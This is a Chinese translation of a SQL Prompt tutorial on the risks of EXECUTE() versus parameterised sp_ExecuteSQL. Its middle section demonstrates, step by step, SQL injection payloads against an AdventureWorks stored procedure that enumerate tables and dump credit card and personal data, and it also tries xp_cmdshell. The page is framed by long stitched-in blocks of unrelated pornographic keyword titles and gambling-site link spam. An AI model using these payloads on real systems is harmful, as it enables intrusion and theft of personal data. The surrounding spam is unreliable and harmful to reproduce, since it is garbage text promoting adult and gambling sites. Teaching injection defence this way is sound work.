超碰91资源站-超碰97豆花-超碰97人妻-超碰97人人干-超碰97人人香蕉-超碰97天天操-超碰97在线资源站-超碰97资源站共享-超碰97资源站总站-超碰aa在线91-超碰av操-超碰爱爱

半岛外围网上直营

SQL語法提示工具SQL Prompt使用教程:使用EXECUTE(“SQL腳本”)的風(fēng)險(xiǎn)

翻譯|使用教程|編輯:莫成敏|2020-01-21 14:08:16.620|閱讀 331 次

概述:SQL Prompt的代碼分析規(guī)則BP013將提醒您使用Execute(string)來執(zhí)行字符串中的批處理,該字符串通常是根據(jù)用戶輸入動態(tài)組裝的。這種技術(shù)很危險(xiǎn),因?yàn)閰?shù)值是在SQL Server解析該語句之前注入的,從而使攻擊者可以“標(biāo)記”額外的語句。請改用sp_ExecuteSql,并驗(yàn)證字符串輸入。

# 界面/圖表報(bào)表/文檔/IDE等千款熱門軟控件火熱銷售中 >>

相關(guān)鏈接:

SQL Prompt根據(jù)數(shù)據(jù)庫的對象名稱、語法和代碼片段自動進(jìn)行檢索,為用戶提供合適的代碼選擇。自動腳本設(shè)置使代碼簡單易讀--當(dāng)開發(fā)者不大熟悉腳本時尤其有用。SQL Prompt安裝即可使用,能大幅提高編碼效率。此外,用戶還可根據(jù)需要進(jìn)行自定義,使之以預(yù)想的方式工作。

點(diǎn)擊下載SQL Prompt正式版


有時不可避免地使用動態(tài)SQL,但是執(zhí)行直接從包含在執(zhí)行時更改的值的字符串直接創(chuàng)建的動態(tài)SQL是魯莽的。它可以允許SQL注入并且效率也不高。

SQL Prompt的代碼分析規(guī)則,BP013將提醒您使用Execute(),以字符串形式執(zhí)行批處理,該批處理通常是根據(jù)用戶輸入動態(tài)組裝的。使用此命令特別令人懷疑,因?yàn)樗辉试S您參數(shù)化值。

SQL語法提示工具SQL Prompt使用教程:使用EXECUTE(“SQL腳本”)的風(fēng)險(xiǎn)

即使您對可以提交的值有完全的控制和監(jiān)督,并確定它們永遠(yuǎn)不會來自最終用戶,還是最好使用sp_ExecuteSQL存儲過程對輸入進(jìn)行參數(shù)設(shè)置。這不僅更安全,而且還可以幫助查詢優(yōu)化器認(rèn)識到要執(zhí)行的SQL批處理已參數(shù)化,因此適合可重用的計(jì)劃。

無論是EXECUTE命令和sp_ExecuteSQL程序執(zhí)行批處理,而不僅僅是查詢。因此,即使您使用sp_ExecuteSQL,也很容易在存儲過程中引入SQL注入的漏洞。如果您錯誤地將SQL與參數(shù)連接在一起,它將仍然允許惡意用戶引入向該批處理添加額外語句的輸入。

SQL注入漏洞

想象一下,AdventureWorks開發(fā)人員看到此SQL并認(rèn)為“Aha”,我可以提供任何列表作為參數(shù)。

SELECT * FROM person.person WHERE lastname IN ( 'Goldberg', 'Erickson', 'Walters' );

很好,因此在存儲過程中,他可以動態(tài)地匯編代碼

DECLARE @MyList NVARCHAR(50) = '''Goldberg'',''Erickson'',''Walters''';
  EXECUTE ('SELECT * from person.person where lastname in (' + @MyList + ')');

因此,現(xiàn)在他可以提供任何人的姓氏列表并得到結(jié)果。但是,當(dāng)代碼審查員指出可怕的可能性時,現(xiàn)實(shí)很快就會出現(xiàn):

DECLARE @MyList NVARCHAR(50)='''factor'') Select * from sales.creditcard --'
   EXECUTE ('SELECT * from person.person where lastname in ('+@myList+')')

當(dāng)然,您可能會認(rèn)為這有點(diǎn)學(xué)術(shù)性,因?yàn)镾QL注入都是關(guān)于應(yīng)用程序中非參數(shù)化查詢的。好吧,不;引入漏洞的不僅僅是應(yīng)用程序。應(yīng)用程序可以正確地參數(shù)化對存儲過程的調(diào)用,如果存儲過程本身存在漏洞,則可以成功利用漏洞。通過演示更容易解釋。

入侵AdventureWorks

假設(shè)AdventureWorks創(chuàng)建了一個新網(wǎng)站,而開發(fā)人員想要一個產(chǎn)品搜索屏幕,用戶在其中輸入搜索字詞,并且所有相關(guān)產(chǎn)品都顯示在列表中。是的,這似乎很合理。

向數(shù)據(jù)庫新手的開發(fā)人員分配了任務(wù)。該網(wǎng)站以名為WebUser的用戶名建立了連接池。團(tuán)隊(duì)非常謹(jǐn)慎,并確保WebUser無法訪問網(wǎng)站上的任何敏感信息。它只能訪問網(wǎng)站上專門處理WebUser請求的存儲過程。這些存儲過程在模塊的當(dāng)前所有者的上下文中運(yùn)行,以訪問少量基表中的數(shù)據(jù)的受限部分。這樣做是為了允許諸如WebUser訪問必需的數(shù)據(jù)而不能直接訪問任何表。這有效地防止了來自應(yīng)用程序的任何SQL注入訪問接口中的過程或函數(shù)以外的任何東西。一些數(shù)據(jù)庫設(shè)計(jì)人員更喜歡使用沒有登錄的用戶來提供此服務(wù)。

到目前為止,一切都很好。

創(chuàng)建過程并要求數(shù)據(jù)庫開發(fā)人員將其安裝到數(shù)據(jù)庫中之后,開發(fā)人員然后在應(yīng)用程序中仔細(xì)地對存儲過程的調(diào)用進(jìn)行參數(shù)化,以確保應(yīng)用程序不會進(jìn)行任何SQL注入。

這是程序。當(dāng)然,這些評論是我的。我不想讓任何人認(rèn)為這是一個好習(xí)慣。通過使用EXECUTE(),將撤消上述所有明智的預(yù)防措施。

/* we will now create a procedure that not only uses EXECUTE but also
  fails to check the contents of the string parameter passed to it*/
  IF Object_Id('dbo.SelectProductModel') IS NOT NULL
      DROP procedure dbo.SelectProductModel;
  GO
  CREATE PROCEDURE dbo.SelectProductModel @queryString VARCHAR(255)
  WITH EXECUTE AS OWNER --to execute as the login who created this procedure
  AS--health warning!!! This is a demonstration of how not to do it
  EXECUTE (
  'SELECT name,summary,Wheel,Saddle,Pedal, RiderExperience 
    FROM Production.vProductModelCatalogDescription
      WHERE ( name+summary  LIKE ''%'+ @queryString+'%'' )')
  GO--health warning!!! This is a demonstration of how not to do it

使用動態(tài)執(zhí)行的代碼有時有很好的理由,但是這些幾乎總是涉及參數(shù)。在這種情況下,開發(fā)人員需要使用sp_ExecuteSql。最重要的是,應(yīng)使用正確的約定將所有參數(shù)傳遞給它。在此示例中,沒有必要使用動態(tài)SQL,但如果已經(jīng)這樣做,則應(yīng)該這樣做。

IF Object_Id('dbo.SelectProductModel2') IS NOT NULL
      DROP procedure dbo.SelectProductModel2;
  GO
  CREATE PROCEDURE dbo.SelectProductModel2 @queryString VARCHAR(255)
  WITH EXECUTE AS owner
  AS
  EXECUTE sp_ExecuteSQL 
  N'SELECT name,summary,Wheel,Saddle,Pedal, RiderExperience 
    FROM Production.vProductModelCatalogDescription
     WHERE (name+summary  LIKE ''%''+@search+''%'')',N'@search Varchar(20)',@search=@QueryString
  GO

您可以在以下示例中嘗試此版本以證明它。我也會添加一些參數(shù)驗(yàn)證,因?yàn)槲蚁朐谕砩纤瘋€好覺。有一些客戶希望搜索有關(guān)自行車的短語,但其中不包括“–”。

現(xiàn)在,為了說明這一點(diǎn),我應(yīng)該讓您(讀者)建立一個帶有搜索表單和網(wǎng)格的網(wǎng)站,以顯示結(jié)果。相反,我們將在SSMS中對此進(jìn)行仿真,以便您可以嘗試并嘗試一下。

設(shè)置了惡意程序后,我們創(chuàng)建了無權(quán)執(zhí)行任何操作的網(wǎng)站用戶。然后,我們以該用戶身份執(zhí)行任務(wù),并查看通過顯著的數(shù)據(jù)泄露我們可以走多遠(yuǎn)。

IF EXISTS (SELECT * FROM sys.sysusers AS S2 WHERE S2.name LIKE 'WebUser')
       DROP USER Webuser;
    -- We need to execute some of the following code with the restricted access rights of a
    -- typical web user that has only access rights to the stored procedure that accesses
    -- the table We then run part of the script as that user.
    CREATE USER WebUser WITHOUT LOGIN;
  /* we now assign it permission to call the stored procedure. It has no choice because
  this is being done in middleware on the web server. Every attempt to break into the database has to be done merely by changing the search term for Adventureworks bicycles.
  */
   GRANT EXECUTE ON OBJECT::dbo.SelectProductModel
      TO WebUser;  
   GRANT EXECUTE ON OBJECT::dbo.SelectProductModel2
      TO WebUser; 
  execute as user = 'WebUser'
  /* now we are working as WebUser. */

您必須想象我是一個外部入侵者,是通過網(wǎng)站而不是SSMS執(zhí)行此操作的(如果我可以訪問它,那么我已經(jīng)出門在外了。)我必須將搜索詞放入網(wǎng)絡(luò)表單中并研究結(jié)果。我對此數(shù)據(jù)庫一無所知。因?yàn)轱@示了錯誤,我得到了幫助,并且可以在網(wǎng)站結(jié)果網(wǎng)格中看到結(jié)果。即使沒有錯誤,我也會受到輕微的抑制,因?yàn)閺捻憫?yīng)時間可以判斷很多事情。

我的第一個目標(biāo)是找出表的名稱及其模式。如果我不了解他們,那么會經(jīng)歷很多嘗試和錯誤,這可能需要很長時間和耐心。然后,我需要知道列和數(shù)據(jù)類型。如果我能找到一種方法來做所有的事情,那我就可以回家了。

我們開始吧。

Execute dbo.SelectProductModel 'light'
SQL語法提示工具SQL Prompt使用教程:使用EXECUTE(“SQL腳本”)的風(fēng)險(xiǎn)

這似乎行得通。讓我們通過添加表達(dá)式來檢查是否正確地將其參數(shù)化。我作為“WebUser”,想知道“始終正確”的技巧是否有效。我輸入搜索詞“輕”或1 = 1 –“

EXECUTE dbo.SelectProductModel 'light'' or 1=1 --'
    /* Msg 102, Level 15, State 1, Line 59 Incorrect syntax near '1'*/

服務(wù)器端錯誤肯定表明該漏洞存在。我需要添加一個括號嗎?

EXECUTE dbo.SelectProductModel 'light'') or 1=1 --'
SQL語法提示工具SQL Prompt使用教程:使用EXECUTE(“SQL腳本”)的風(fēng)險(xiǎn)

這列出了所有產(chǎn)品型號。 如果您使用該過程的第二個版本SelectProductModel2,該查詢將不返回任何產(chǎn)品,因?yàn)樗鼘⑺阉髯址?light')或1 = 1-,這根本不存在。

  /* Can I do the union all trick? */
  --I don't know the names of any tables so I'll use functions
  EXECUTE dbo.SelectProductModel 'ffff'') union all
   SELECT db_name(), @@Servername,User_Name(), ORIGINAL_LOGIN( ) , session_user,''''
    --'
SQL語法提示工具SQL Prompt使用教程:使用EXECUTE(“SQL腳本”)的風(fēng)險(xiǎn)

 /* well that works and tells me that all columns are strings because I got no error 
   in the UNION. Within the stored procedure, I'm A DBO!!! */
  EXECUTE dbo.SelectProductModel 'ffff'') union all
   SELECT Object_schema_name(object_id), name, '''','''','''','''' from sys.tables
    --'
SQL語法提示工具SQL Prompt使用教程:使用EXECUTE(“SQL腳本”)的風(fēng)險(xiǎn)

/* some interesting tables. I like that CreditCard table. This saves me a lot of time 
  Where are the credit cards? */ 
  EXECUTE dbo.SelectProductModel 'ffff'') union all
  SELECT Object_schema_name(t.object_id),t.name,c.name,'''','''','''' FROM sys.columns c INNER JOIN sys.tables t ON c.object_id=t.object_id WHERE t.name=''creditcard''
   --'
SQL語法提示工具SQL Prompt使用教程:使用EXECUTE(“SQL腳本”)的風(fēng)險(xiǎn)

/* this is taking candy from a baby. We know the columns and table now!
  List out the credit cards on the website grid and over to the dark side */ 
  EXECUTE dbo.SelectProductModel 'ffff'') union all
  Select CreditCardID,CardType,CardNumber,ExpMonth,ExpYear,ModifiedDate from Sales.Creditcard
   --'
SQL語法提示工具SQL Prompt使用教程:使用EXECUTE(“SQL腳本”)的風(fēng)險(xiǎn)

/* Can I use xp_cmdshell? */
  EXECUTE dbo.SelectProductModel 'ffff'');
  Execute xp_cmdshell ''dir *.*''
   --' 
  /* No. maybe I can reconfigure  */
  EXECUTE dbo.SelectProductModel 'ffff'');
  execute sp_configure ''show advanced options'',1;reconfigure with override 
  --' 
  /*
  Msg 15247, Level 16, State 1, Procedure sp_configure, Line 105 [Batch Start Line 96]
  User does not have permission to perform this action.
  Msg 5812, Level 14, State 1, Line 100
  You do not have permission to run the RECONFIGURE statement*/
不要緊。我仍然可以通過網(wǎng)站獲取有效載荷。現(xiàn)在我有了信用卡,我去找那個person.person表。某件事告訴我那里有個人數(shù)據(jù)。讓我們研究一下該表中的內(nèi)容。

EXECUTE dbo.SelectProductModel 'ffff'') union all
  SELECT Object_schema_name(t.object_id),t.name,c.name,is_nullable,max_length,system_type_id FROM sys.columns c INNER JOIN sys.tables t ON c.object_id=t.object_id WHERE t.name=''person''
   --'
SQL語法提示工具SQL Prompt使用教程:使用EXECUTE(“SQL腳本”)的風(fēng)險(xiǎn)

我認(rèn)為,從這些數(shù)據(jù)來看,如果我將各列連接在一起,則可以一次性提取出來。

EXECUTE dbo.SelectProductModel 'ffff'') union all
  SELECT persontype,BusinessEntityID,Coalesce(Title+'' '','''')+FirstName+'' ''+Coalesce(MiddleName+'' '','''')+LastName+Coalesce('' ''+Suffix,''''),EmailPromotion,AdditionalContactInfo,Demographics FROM person.person
    --'
SQL語法提示工具SQL Prompt使用教程:使用EXECUTE(“SQL腳本”)的風(fēng)險(xiǎn)

簡而言之,AdventureWorks的所有個人詳細(xì)信息和銷售現(xiàn)在都在走向黑暗網(wǎng)絡(luò)。當(dāng)然,這很費(fèi)力,因?yàn)槲乙ㄟ^網(wǎng)站上的POST獲取有效負(fù)載,并且可能不得不重新組裝來自位的數(shù)據(jù),但是即使是很小的破壞也會造成破壞!

最后整理一下

SELECT USER_NAME();
  REVERT;
  SELECT USER_NAME();
  IF EXISTS (SELECT * FROM sys.sysusers AS S2 WHERE S2.name LIKE 'WebUser')
      DROP USER WebUser;
  IF OBJECT_ID('dbo.SelectProductModel') IS NOT NULL
      DROP PROCEDURE dbo.SelectProductModel;

結(jié)論

將字符串作為SQL批處理執(zhí)行的技術(shù)本質(zhì)上沒有錯。但是,這是編程的安全領(lǐng)域。如果不參數(shù)化該字符串中的值,則可能很危險(xiǎn)。有時,由于SQL語法的多變,您無法做到,而且也沒有解決方法,在這種情況下,您需要采取所有必要的預(yù)防措施來驗(yàn)證輸入。出于這個原因,不鼓勵使用Execute(),因?yàn)樗鼪]有參數(shù)化其輸入的方法,并且檢查sp_ExecuteSQL的使用,以確保已采取所有適當(dāng)?shù)念A(yù)防措施來防止SQL注入,所以是一個好主意。

本文內(nèi)容到這里就結(jié)束了,感興趣的朋友可以下載SQL Prompt免費(fèi)體驗(yàn)~也可以關(guān)注我們網(wǎng)站了解更多產(chǎn)品資訊~

相關(guān)內(nèi)容推薦:

SQL Prompt 使用教程>>>


想要購買SQL Prompt正版授權(quán),或了解更多產(chǎn)品信息請點(diǎn)擊




標(biāo)簽:

本站文章除注明轉(zhuǎn)載外,均為本站原創(chuàng)或翻譯。歡迎任何形式的轉(zhuǎn)載,但請務(wù)必注明出處、不得修改原文相關(guān)鏈接,如果存在內(nèi)容上的異議請郵件反饋至chenjj@ke049m.cn

文章轉(zhuǎn)載自:

為你推薦

  • 推薦視頻
  • 推薦活動
  • 推薦產(chǎn)品
  • 推薦文章
  • 慧都慧問
掃碼咨詢


添加微信 立即咨詢

電話咨詢

客服熱線
023-68661681

TOP
利記足球官網(wǎng)(官方)網(wǎng)站/網(wǎng)頁版登錄入口/手機(jī)版登錄入口-最新版(已更新) 真人boyu·博魚滾球網(wǎng)(官方)網(wǎng)站/網(wǎng)頁版登錄入口/手機(jī)版登錄入口-最新版(已更新) 最大網(wǎng)上PM娛樂城盤口(官方)網(wǎng)站/網(wǎng)頁版登錄入口/手機(jī)版登錄入口-最新版(已更新) 正規(guī)雷火競技官方買球(官方)網(wǎng)站/網(wǎng)頁版登錄入口/手機(jī)版登錄入口-最新版(已更新) 雷火競技權(quán)威十大網(wǎng)(官方)網(wǎng)站/網(wǎng)頁版登錄入口/手機(jī)版登錄入口-最新版(已更新) boyu·博魚信譽(yù)足球官網(wǎng)(官方)網(wǎng)站/網(wǎng)頁版登錄入口/手機(jī)版登錄入口-最新版(已更新) 權(quán)威188BET足球網(wǎng)(官方)網(wǎng)站/網(wǎng)頁版登錄入口/手機(jī)版登錄入口-最新版(已更新) 正規(guī)188BET足球大全(官方)網(wǎng)站/網(wǎng)頁版登錄入口/手機(jī)版登錄入口-最新版(已更新) 国产午夜无码喷水福 | 精品国产一区二区三区av麻 | 91国语精品自产拍在线观看一 | 国产精品视频一区二区猎奇 | 国在线产香蕉精 | 国产无套精品 | 成人一区二区三区免费看 | 爆乳高潮喷水无码正在播放 | 国产中文男人天堂 | 国产欧美亚洲另类aⅴ | 国产欧美日韩在线一区二区 | 国产探花在线精品一区二区 | 国产成人在线第一 | av天堂精品久久 | 国产综合变态自虐重口另类 | 成人无码视频观看 | 国产精品白嫩极品久久久久 | 国产无套粉嫩白浆在线观看 | av免费网| 国产综合精品一区二区 | av一区二区三区不卡在 | 91久久精品国产91 | 国产麻豆md传媒视频 | 精品国产福利第一区二区三区 | 国产a国产片色老头 | 高清一区二区三区免费视频 | 成人精品高清视频 | 国产原创高清不卡av在线一区 | 国产成人精品第一区揄拍无码 | 国产成人av一区二区三区在线观看 | 国产在线视频一区 | 国产毛片一级 | 国产福利区一区二在线观看 | 国产精品美女www爽爽爽视 | 精品无码国产 | 91精品国产91热久久p | 国产无套乱子伦精彩是白视频 | 成网站在线观看人免费 | 91麻豆精品国产一区色欲噜噜噜 | 国产毛片japa | 成人免费aⅴ视频一区二区 成人免费aa片 | 国产+欧美日韩+ | 国产一区二区精品久久麻豆 | 国产成人高清精品免费软件 | 国产精品入口麻豆高清在线 | 丰满的熟妇岳中文字幕 | 99国产一区二区三 | 精品国产高清一区二区三区 | 国产对白播放在线播放 | 91福利网| 2025中文字幕在线观看 | 国产精品免费区一区二区三 | 国产真实乱对白精彩久久老熟妇女 | 国产亚洲漂亮白嫩美女在线 | 97人妻久久公开视频 | 精品亚洲国产成人av不卡 | 国产成人精品系列在线观看 | 国产三级电影经典在线看 | 精品国产日韩亚洲一区在线 | 精品国产高清一区二区广区 | 国内盗摄视频一区二区三区 | 国产成人精品一区二区三区免费 | 国产精品精品国内自产拍被发现 | 成av人片在线观看无码 | 国产成人激情五月 | a级孕妇高清免费毛片 | 国产成人爱片免费观看视频 | 成人小說亞洲一區二區三區 | 国产99er66在线视频 | 99久久国内精品成人免费 | av人妻精品 | 国产经典在线观看一区 | 国产爆乳无码视频在线观看3 | 二区欧美无遮挡中文字幕人成人 | 精品国产系列av在线 | 国产成a人亚洲精v品无码性色 | 国产va在线观看免费 | 二区在线观看 | 国产丰满老熟女60岁重口对白 | 国产在线污污福利网站 | 精品国产三上悠亚在线观看 | 911精品亚洲永久免费精品 | 爆乳国产在线正在播放 | 国产成人精品亚洲观看一区五月天 | h无码无修动漫在线观看 | 91午夜福利国产在 | 91精品国产麻豆福利在线电影 | 国产精品成av人在线观看片 | 国产极品嫩模 | 国产亚洲欧美日韩综合另类 | 国产成人高清精品免费鸭子 | 国产免费无码不卡网站 | 成人无码区在线观看 | 成人欧美一区二区三区在线视频 | 精品日韩欧美国产一区二区三区 | 3d动漫精品一区视频 | 91精品国产高清久久久久久 | 大尺度做爰无遮挡动漫 | 国产午夜人做人免费 | 精品国产96亚洲一区二区三区 | 国产成人深夜福利短视频99 | 国产午夜精品不卡观看 | 精品人妻系列无码一区二区三区 | 国产精品一区二区三区在线 | 国产极品美女无套内射 | 顶级少妇a级毛片 | 国产91精品免费在线观看 | 国产无码一区二区三区四区 | 东京热久久无码dvd一二三区 | 国产精品高潮森林久久av无码 | 国产美女免费牲交视频 | 国产成人无码a区在线视频 国产成人无码mv精品 | 国产一区二区三区精品综合 | 成人免费无码大片a毛片视频 | 9a1v精品少妇一区二区三区 | 国产精品无码高 | 东京无码熟妇人妻av在线网址 | 国产成人欧美日韩在线电影 | 成人a毛片久久免费播放国语 | 国产成人91一区二区三区 | 国产成人久久久久精品 | 国产成人福利免费观看 | 国产精品免费久久久久久久久 | 91福利国产在线观看香蕉 | 国产在线你懂的网址深夜福利 | 国内嫩模私拍精品视频 | 18禁裸乳无遮挡免费网站 | 福利精品短视频在线 | 国产精品无码制服丝袜网站 | 精品成人免费自拍视频 | 国产成人在线视频免费观看 | 国产91电影厂精品福利片 | 变态的让你无法想象 | 国产精品鲁一鲁 | 东京熟一级片集 | 国产野战无套av毛片 | 国产亚洲高清一区二区三区 | 91精品国产自产在线观看 | 国产精品在线就撸 | 国产在线精品一区免费香 | 99久久国产综合精品无码 | 国产欧美亚洲日韩另类a | 国产成人99精品免费观看 | 国产熟女精品一区桃花 | 精品人妻系列无码人妻免费视频 | 国产极品尤物va在线精品 | 精品成人一区二区不卡 | 国产精品欧美一区二区三区不卡 | 国产成人免费高清 | 成人动作片在线观看 | 国产精品毛片一区 | 国产美女裸舞一区二区 | 动漫精品一区二区三区四区 | 国产美女白丝袜精品 | 国产在线不卡的色视频 | 国产亚洲欧美免费视频 | 91亚洲综合最大 | 91精品国产免费久久久久 | 成人午夜无码 | 国产成人精品白浆久久69 | 成a人影片免费观看日本 | 成人在线一区二区三区四区 | 国产成人综合精品日韩 | 韩国男人的天堂 | 国产一区二区激情戏 | 99精品视频九九精品视频 | a级欧美片免费观看 | 不卡无码在线免费 | 国产精品亚洲第一区焦香味 | 国产一区国产二区在线精品 | 91亚洲欧美一区二区三区 | 国产精品青青 | 国产午夜亚洲精品国产 | 69精品人人人人人人人人人 | 国产精品毛片在线 | 国产超碰人人做人人爰 | 国产精品三级在线观看 | 国产亚洲成av人片在线观黄桃 | 国产一区二区在线播放 | 国产日韩亚洲欧美 | 国产成人无码a区在线观看软件 | 国产成人av在线精品无码 | 国产孕妇直播在线观看 | 国产精品极品白 | 精品无人乱码一区二区三区日 | 国产亚洲欧美在线观看一区 | 国产午夜精品久久 | 国产精品任我爽爆在线播放 | 99久久夜色精品国产网站 | 91精选日韩综合永久入口 | 精品无码av不卡久久久久 | www.一区二区三区在线 | 国产一区二区三区美女视频 | 91九色精品国产自产精品 | 国产精品白丝jk白祙喷水视频 | 国产成人www免费人成看片 | 白嫩无码人妻丰满熟妇啪啪 | 国产萌白酱喷水视频在线播放 | 国产精品麻豆综合在线 | 91精品国产茄子在线观看 | 国产麻豆成av人片在线观看 | 国产欧美精品一区二 | 国产一区二区精品久久麻豆 | 国产精品无码高清在线观看 | 国产熟女一区二区精品免费 | 精品无码av一区 | 精品无人区乱码1区2区 | 白丝乳交内射一二 | 国产在线播放一区国产 | 成人午夜看片在线观看 | 97人妻人人做人碰人人爽 | 国产97人人超碰caoprom | 国产超薄丝袜脚交视 | 精品国产免费第一区二区三区日 | 91网站免费看 | av无码观 | www夜片内射视频日韩精品成 | 加勒比hezyo无码专区 | 97亚洲熟妇自偷自拍另类图片 | 国产做ā爰片久久毛片ā片 | 国产精品一级特黄a毛片 | 国产人妻精品一区二区三区不 | 国产精品爆乳中 | 爆乳熟妇一区二区三区爆乳视 | 国产精品三级在线播放 | 国产成人精品一区二区三区视频 | av无码一级毛片免费 | 国产成人精品999在线观看 | 国产精品毛片av一级 | 国产91麻豆精品 | av毛片在线播放免费 | 精品国产96亚洲一区 | 国模自拍日韩在线播放视频网站 | 国产在线精品成人一区二区三区 | 国产超污在线无码观看 | 国产福利片一区二区 | 国产午夜av秒播在线观看 | 国产一区二区三区五区六区 | 国产av国片精品有毛 | 91精品在线播放 | 91探花视频在线观看 | 成人午夜精品久久久久久久小说 | 国产亚洲午夜影视在线观看 | av无码午夜福利一区二区三区 | 精品无码成人网站久久久久久无码 | 国产在线精品中文字幕 | 国产午夜无码精品免费看动漫 | 国产毛片午夜无码专区喷水 | 国产白嫩护士被弄高潮 | 91久久久久就去色色精品 | 国精无码欧精品 | 国产综合精品99久久久久 | av免费在线 | 国产高清无码97在线 | 国产经典aⅴ三级观看 | 精品亚洲日韩国产成人av在线 | 精品久久久无码人妻中文字幕免费 | 国产亚洲综合专区在线 | 国产一区亚洲专区 | 国产亚洲精久久久久久无码苍井空 | 国产日韩久久久久精品影视 | 精品深夜av无码 | 国产成人av在线你懂的 | 国产精品午夜福利在线观看网站 | 国产精品伊人久久久久 | 精品一区二区高清免费观 | 国产成人一区二区三区影院免 | av成人黄色在线观看 | 国产片婬乱一毛片a | 成人综合小说欧美亚洲一区 | 国产欧美日韩在线中文一区 | a亚洲中文字幕人成影院 | 国产精品合集一区二区三区 | 国产精品午夜高清在线观看 | 国产精品成人va在线观看入口 | 国产午夜福利白浆一区二区 | 国产精品毛片一区二区三区在 | 2025国产麻豆剧果冻传媒免 | 91久久人妻精品中文无码 | 国产交换一区二区三区 | 精品无码欧美三级 | 国产精品成人观看视频免费 | 97人人添人人澡人人澡人人澡 | 91大神精品无码在线观看 | 国产高清吃奶成免费视频网站 | 国产一区二区三区美女图片 | av在线播放国产 | 国产高清一区二区三区四区 | 成人a级毛片免费观看av一区 | 国产一区二区三区正品 | 国产高潮成人免费视频在线观看 | 国产午夜福利在线观看红一片 | 极品国产一区二区三区 | 国产成人精品亚洲日本专区61 | 国产日韩欧美不卡在线二区 | 国产美女黄色网站18禁aⅴ | 国产短视频精品一区二区三区 | 东京热毛片无码dvd一二三区 | 2025国产精品视频网站 | 国产精品兄妹在线观看麻豆 | 国产午夜精品一区二区三区四 | 国产日韩无码 | 国产午夜av秒播 | 国产亚洲综合区成人国产系列 | 国产精品无码专区在线观看 | 91麻豆精品国产91久 | 91午夜福利国产 | 18禁男女无遮挡网站 | 国产av无码专区 | 国产不卡无码免费视频 | 国产精品无码亚洲精品2025 | 91亚洲精品福利在线播放 | 精品国产一区av天美传媒 | 18禁喷水流白浆自慰视噜噜噜 | 国产成人综合久久免费导航 | 国产在线高清伦免费理视频 | 怀孕动漫精品国产一区二区三区 | 成人无码a区视频在线观看 成人无码a区在线观看视 | 国产二三区国产一级淫片a 国产二三无码区 | 国产一区二区三区成人久久 | 18禁超污无遮挡无 | 成人嫩草研究院久久久精品 | 国产精品成熟老妇女 | 动漫精品无码中文字幕一区 | 国产日韩欧美成人免费观看 | 国产高潮流白浆免费观看不卡 | 精品国产一区二区三区麻豆 | 成人无码嫩草影院 | 精品国产va久久久久久久冰 | 国产黄片三级视频 | 成人无码精品一区二区三区 | 成人免费无码大片a毛片软件 | 国产三级高清视频在线观看 | 国产v亚洲v天堂无码久久久 | 国产精品视频无圣光一区 | av无码专区 | 国产黄色大片在线观看激情 | 高清无码一区二区三区 | 国产精品国产三级国av麻豆 | 国产av不卡一区二区三区 | 国产肥熟女视频一区二区视频 | 国产精品露出91 | 国产精品无码久久久久久免费 | 动漫处女自慰日韩一区二区 | 99国产这里只有精品视频播放 | 国产精品无码一区二区三区 | 国产不卡福利片在线观看浪潮 | 丰满熟女高潮毛 | 国产精品成人av | 国产精品无码久久av | 精品无码一区二区三区电影 | 国产91精品人妻互换在线 | 国产在线视频无码台湾 | 国产一成人精品福利网站 | 91久久久久精品无码∫ | 国产精品自拍亚洲zu | 2025国产精品自在拍在线播放 | 国产成人综合五月天久久 | 国内性生大片免费观看 | 国产成年女人特黄特色大片免费 | 成年女人免费视频播试看 | 91午夜精品久久久久精品 | 国产小视频网在线播放 | 99久久久国产精品 | 成人影视免费高清在线观看网站a | 动漫洲国产精品无码专区2d | 18禁无遮挡羞羞漫画在线播放 | 精品人妻一区二区三区 | 91精品国产高久久久成人 | 成人免费午夜在线观看 | 国产91精品高清一区二区三区 | 国产福利片在线观不卡 | 成人精品一区二区三区久久 | 精品无码成人片一区二区 | 99国产欧美另类久久久精品 | jk制服美女高潮中出视频 | av天堂热无码手机版 | 精品视频一区二区三三区 | 成人在线一区二区三区四区 | 精品亚洲一区二区三区在线观看 | 国产制服精品一区二区视色 | 99尹人香蕉国产免费天天 | 国产爆乳成av人在线播放 | 国产成人精品免费视频大全可播 | 2025国产成人福利精品视频 | 国产精品入口麻豆高清在线 | 国产一区二区三区91在线 | 国产精品乱码一区二区 | 国产波霸爆乳一区二区黄色 | 国产人妻一区二区无码 | 国产一卡2卡3卡4卡公司 | 国产成成视频在线观看 | av秋霞电影在线播 | 国产成人综合在线视频 | 国产二级一片内射视频播放 | 91成人在线观看 | 丰满人妻一区二区三区视频53 | 囯产免费久久久久久国产免费 | 国产精品午夜理论片在线播放 | 国产麻豆精品传媒av | 国产精品欧美亚洲韩国日本不卡 | 岛国少妇精品久久中文字幕 | 国产精品高潮在线 | 国产宾馆精品在线播放 | 99久久精品国产高清一区二区 | 国产午夜精品免费视频观看 | 国产午夜精品无码 | 国产精品出租屋系列 | 国产成人免费观看 | 国产爆乳无码精品视频 | 国内精品久久人妻无码妲己 | 18禁黄网站无码无遮挡 | 成人无码片黄网站a毛片免费 | 国产免费一区二区三区在线观看 | 91精品国产91热久久久福利 | 精品无人区麻豆 | 91精品国产免费久久 | 精品国产天堂综合一区在线 | 国产成人无码电影在线观看 | 国产蜜桃一区二区三区在线观看 | 精品人妻无码中字系列 | 国产成人免费影片 | 99久久精品日本一区二区免 | 国产ts人妖在线视频网站 | 国产动漫一区二区三区在线观看 | 国产肝交视频在线观看 | 国产成人久久av一区二区 | 国产尤物av尤物在线看 | 99国产这里只有精品视频播放 | 精品国产一区二区三区四区色欲 | 2025国产精品福利在线观 | 91在线国产在线观看高清 | 91精品国产自产在线啪免费 | 国产经典三级视频在线观看 | 91视频导航 | 国内精品视这里只有精品 | 国产成人无码精品a级毛片抽搐 | 国产精品无码一二三区免费 | 成人片黄网站久久久免费 | 国模无码一区二区三区 | 国产精品高潮呻吟久久av无码 | 国产高清无码在线一区二区 | 国产精品亚洲天堂 | 国产a级毛片免费视频一区二区 | 极品尤物国产在线播 | 18禁超污无遮挡免费av | 国产精品厕所电影 | 国产综合无码一区二区色蜜蜜 | 国产成人无码av片在线观看 | 国产精品美 | 成人亚洲精品另类动态 | 国产精品三级一区二区 | 国产午夜人成在线视频 | av蜜臀网站 | 国产午夜福利在线观看 | 精品精品国产自在久久 | 国产69精品久久久久乱码 | 国产女人喷浆抽搐高潮视频 | 91精品丝袜国产在线一区 | 高潮真紧好爽我视频 | av尤物| 国产无套视频免费看 | av天堂一区二区三区 | 国产aⅴ一二三区无码视频 国产aⅴ一区 | 精品无人区无码乱码大片国产 | 精品亚洲视频在线观看 | 国产激情视频在线播放 | 99久久国产精品一区二区 | 99精品热在线高清观看视频 | 国产激情一区二区三区成人91 | 国产成人无码aⅴ片在线观看 | 